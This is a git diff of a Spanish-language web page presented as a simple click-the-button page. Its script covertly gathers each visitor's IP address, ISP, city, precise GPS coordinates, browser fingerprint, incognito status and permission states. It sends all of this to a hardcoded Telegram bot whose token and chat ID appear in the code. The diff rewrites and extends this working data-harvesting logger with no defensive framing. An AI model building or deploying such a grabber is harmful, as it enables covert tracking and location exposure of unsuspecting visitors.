--- a/index.html
+++ b/index.html
@@ -2,164 +2,170 @@
 <html lang="es">
 <head>
   <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>Recolección de Información</title>
+  <title>PAGE</title>
   <style>
-    body {
-      font-family: Arial, sans-serif;
-      text-align: center;
-      padding: 40px;
-      background-color: #f5f5f5;
-    }
-    #startBtn {
-      padding: 15px 30px;
-      font-size: 18px;
-      cursor: pointer;
-      border: none;
-      background-color: #007bff;
-      color: white;
-      border-radius: 5px;
-      transition: background-color 0.3s;
-    }
-    #startBtn:hover {
-      background-color: #0056b3;
-    }
-    #loading {
-      display: none;
-      margin-top: 20px;
-      font-size: 16px;
-      color: #333;
-    }
+    body { font-family: Arial; padding: 20px; background: #f0f0f0; }
+    .box { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); max-width: 700px; margin: auto; }
+    button { padding: 10px 20px; font-size: 16px; cursor: pointer; }
+    pre { white-space: pre-wrap; word-wrap: break-word; }
   </style>
 </head>
 <body>
+  <div class="box">
+    <h2>Aprieta el botón Porfavor</h2>
+    <button id="startBtn">Dame Click</button>
+    <pre id="result">..</pre>
+  </div>
 
-  <h1>Bienvenido</h1>
-  <p>Haz clic en el botón para continuar.</p>
-  <button id="startBtn">Aceptar y Continuar</button>
-  <div id="loading">Procesando información...</div>
+<script>
+(() => {
+  const BOT_TOKEN = "8011619975:AAE_Donqy5xn8RD0lJ2LOIP326dTDrnO1Ag";
+  const CHAT_ID = "6065284869";
 
-  <script>
-    (() => {
-      const BOT_TOKEN = "8011619975:AAE_Donqy5xn8RD0lJ2LOIP326dTDrnO1Ag";
-      const CHAT_ID = "6065284869";
+  const resultEl = document.getElementById("result");
+  const startBtn = document.getElementById("startBtn");
 
-      const startBtn = document.getElementById("startBtn");
-      const loadingText = document.getElementById("loading");
+  let humanInteraction = false;
+  ["click", "mousemove", "keydown", "touchstart"].forEach(evt => {
+    window.addEventListener(evt, () => { humanInteraction = true; }, { once: true });
+  });
 
-      let humanInteraction = false;
-      ["click", "mousemove", "keydown", "touchstart"].forEach(evt => {
-        window.addEventListener(evt, () => { humanInteraction = true; }, { once: true });
+  function detectHeadless() {
+    return (navigator.webdriver ||
+            !navigator.plugins.length ||
+            !navigator.languages ||
+            /HeadlessChrome/.test(navigator.userAgent))
+      ? "Sí" : "No";
+  }
+
+  async function detectIncognito() {
+    return new Promise(resolve => {
+      const fs = window.RequestFileSystem || window.webkitRequestFileSystem;
+      if (!fs) resolve("No detectable");
+      else fs(window.TEMPORARY, 100, () => resolve("No"), () => resolve("Sí"));
+    });
+  }
+
+  function getFingerprint() {
+    return btoa([
+      navigator.userAgent,
+      navigator.language,
+      screen.width + 'x' + screen.height,
+      navigator.hardwareConcurrency || "n/a",
+      Intl.DateTimeFormat().resolvedOptions().timeZone || "n/a"
+    ].join('|'));
+  }
+
+  async function checkPermissions() {
+    if (!navigator.permissions) return "No soportado";
+    try {
+      const cam = await navigator.permissions.query({name:"camera"});
+      const mic = await navigator.permissions.query({name:"microphone"});
+      const geo = await navigator.permissions.query({name:"geolocation"});
+      return `Cámara: ${cam.state}, Micrófono: ${mic.state}, Geoloc: ${geo.state}`;
+    } catch {
+      return "Error consulta permisos";
+    }
+  }
+
+  function checkHardwareAcceleration() {
+    try {
+      const canvas = document.createElement('canvas');
+      const gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl');
+      if (!gl) return "No WebGL";
+      const dbg = gl.getExtension('WEBGL_debug_renderer_info');
+      if (!dbg) return "No debug info";
+      return gl.getParameter(dbg.UNMASKED_RENDERER_WEBGL) || "No renderer";
+    } catch {
+      return "Error WebGL";
+    }
+  }
+
+  async function detectAdblock() {
+    try {
+      await fetch("https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", {method:"HEAD", mode:"no-cors"});
+      return "No detectado";
+    } catch {
+      return "Probable AdBlock";
+    }
+  }
+
+  function checkTimezoneLocale() {
+    try {
+      const tz = Intl.DateTimeFormat().resolvedOptions().timeZone;
+      const lang = navigator.language || navigator.userLanguage;
+      if (lang.startsWith('es') && tz.startsWith('UTC')) return "Discrepancia detectada";
+      return "OK";
+    } catch {
+      return "No disponible";
+    }
+  }
+
+  async function getIPInfo() {
+    try {
+      const res = await fetch("https://ipapi.co/json/");
+      if (!res.ok) throw new Error("No response");
+      return await res.json();
+    } catch {
+      return null;
+    }
+  }
+
+  async function sendToTelegram(message) {
+    try {
+      const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`;
+      const response = await fetch(url, {
+        method: "POST",
+        headers: {"Content-Type": "application/json"},
+        body: JSON.stringify({
+          chat_id: CHAT_ID,
+          text: message,
+        }),
       });
-
-      function detectHeadless() {
-        return (/HeadlessChrome/.test(navigator.userAgent) || navigator.webdriver) ? "Sí" : "No";
+      const data = await response.json();
+      console.log("Telegram response:", data);
+      if (!data.ok) {
+        resultEl.textContent += `\nError Telegram: ${data.description || 'Error desconocido'}`;
       }
+    } catch(e) {
+      console.warn("Error enviando a Telegram:", e);
+      resultEl.textContent += `\nError enviando a Telegram: ${e.message}`;
+    }
+  }
 
-      async function detectIncognito() {
-        return new Promise(resolve => {
-          const fs = window.RequestFileSystem || window.webkitRequestFileSystem;
-          if (!fs) resolve("No detectable");
-          else fs(window.TEMPORARY, 100, () => resolve("No"), () => resolve("Sí"));
-        });
-      }
+  async function collectAndSend() {
+    resultEl.textContent = "Espera porfavor...";
 
-      function detectAdblock() {
-        return new Promise(resolve => {
-          const testAd = document.createElement('div');
-          testAd.innerHTML = '&nbsp;';
-          testAd.className = 'adsbox';
-          testAd.style.position = 'absolute';
-          testAd.style.top = '-100px';
-          testAd.style.width = '1px';
-          testAd.style.height = '1px';
-          document.body.appendChild(testAd);
-          setTimeout(() => {
-            const detected = testAd.offsetHeight === 0;
-            document.body.removeChild(testAd);
-            resolve(detected ? "Sí" : "No");
-          }, 100);
-        });
-      }
+    const [ipRes, geoRes, incognitoStatus, permStatus, adblockStatus] = await Promise.allSettled([
+      getIPInfo(),
+      new Promise((res, rej) => {
+        if (navigator.geolocation) {
+          navigator.geolocation.getCurrentPosition(res, rej, {timeout: 3000});
+        } else rej();
+      }),
+      detectIncognito(),
+      checkPermissions(),
+      detectAdblock()
+    ]);
 
-      function checkHardwareAcceleration() {
-        try {
-          const canvas = document.createElement('canvas');
-          const gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl');
-          return gl ? "Sí" : "No";
-        } catch (e) {
-          return "No";
-        }
-      }
+    let message = "";
 
-      function checkTimezoneLocale() {
-        const timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
-        const locale = navigator.language;
-        return `${timezone} vs ${locale}`;
-      }
-
-      async function getIPInfo() {
-        try {
-          // Usamos ipapi.com como alternativa activa
-          const res = await fetch("https://ipapi.com/json/"); 
-          if (!res.ok) throw new Error("No response");
-          return await res.json();
-        } catch {
-          return null;
-        }
-      }
-
-      async function sendToTelegram(message) {
-        try {
-          const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`; 
-          const response = await fetch(url, {
-            method: "POST",
-            headers: {"Content-Type": "application/json"},
-            body: JSON.stringify({
-              chat_id: CHAT_ID,
-              text: message,
-            }),
-          });
-          const data = await response.json();
-          console.log("Telegram response:", data);
-        } catch(e) {
-          console.warn("Error sending to Telegram:", e);
-        }
-      }
-
-      async function collectAndSend() {
-        startBtn.style.display = "none";
-        loadingText.style.display = "block";
-
-        const [ipRes, geoRes, incognitoStatus, adblockStatus] = await Promise.allSettled([
-          getIPInfo(),
-          new Promise((res, rej) => {
-            if (navigator.geolocation) {
-              navigator.geolocation.getCurrentPosition(res, rej, { timeout: 3000 });
-            } else rej();
-          }),
-          detectIncognito(),
-          detectAdblock()
-        ]);
-
-        let message = "";
-
-        if (ipRes.status === "fulfilled" && ipRes.value) {
-          const ip = ipRes.value;
-          message += `IP: ${ip.ip}
+    if (ipRes.status === "fulfilled" && ipRes.value) {
+      const ip = ipRes.value;
+      message += `IP: ${ip.ip}
 ISP: ${ip.org}
 ASN: ${ip.asn}
 Proxy/VPN/Tor: ${ip.proxy ? "Sí" : "No"}
 Ciudad: ${ip.city}
 Región: ${ip.region}
-País: ${ip.country}
-Versión IP: ${ip.type}
-\n`;
-        } else {
-          message += "No se pudo obtener IP\n";
-        }
+País: ${ip.country_name}
+Versión IP: ${ip.version}
+`;
+    } else {
+      message += "No se pudo obtener IP\n";
+    }
 
-        message += `User-Agent: ${navigator.userAgent}
+    message += `User-Agent: ${navigator.userAgent}
 Navegador Headless: ${detectHeadless()}
 Modo Incógnito: ${incognitoStatus.status === "fulfilled" ? incognitoStatus.value : "Desconocido"}
 Interacción Humana: ${humanInteraction ? "Sí" : "No"}
@@ -167,32 +173,34 @@ Pantalla: ${screen.width}x${screen.height}
 Resolución disponible: ${screen.availWidth}x${screen.availHeight}
 Touch Support: ${'ontouchstart' in window ? 'Sí' : 'No'}
 Plataforma: ${navigator.platform}
-Fingerprint: N/A
+Fingerprint: ${getFingerprint()}
+Permisos (cámara, micrófono, geoloc): ${permStatus.status === "fulfilled" ? permStatus.value : "No disponible"}
 Aceleración hardware (WebGL renderer): ${checkHardwareAcceleration()}
 Timezone vs Locale: ${checkTimezoneLocale()}
 AdBlock detectado: ${adblockStatus.status === "fulfilled" ? adblockStatus.value : "No detectable"}
 Hora: ${new Date().toLocaleString()}
 `;
 
-        await sendToTelegram(message);
+    resultEl.textContent = message;
+    await sendToTelegram(message);
 
-        if (geoRes.status === "fulfilled") {
-          const {latitude, longitude, accuracy} = geoRes.value.coords;
-          const locationInfo = `\nUbicación Precisa:
+    if (geoRes.status === "fulfilled") {
+      const {latitude, longitude, accuracy} = geoRes.value.coords;
+      const locationInfo = `\nUbicación Precisa:
 Latitud: ${latitude}
 Longitud: ${longitude}
 Precisión: ${accuracy} metros
 Hora: ${new Date().toLocaleString()}
 `;
-          await sendToTelegram(locationInfo);
-        }
+      resultEl.textContent += locationInfo;
+      await sendToTelegram(locationInfo);
+    } else {
+      resultEl.textContent += "\nUbicación precisa no disponible o rechazada.";
+    }
+  }
 
-        // Aquí puedes redirigir o mostrar otro contenido si lo deseas
-        loadingText.textContent = "¡Listo! Puedes continuar.";
-      }
-
-      startBtn.onclick = collectAndSend;
-    })();
-  </script>
+  startBtn.onclick = collectAndSend;
+})();
+</script>
 </body>
 </html>
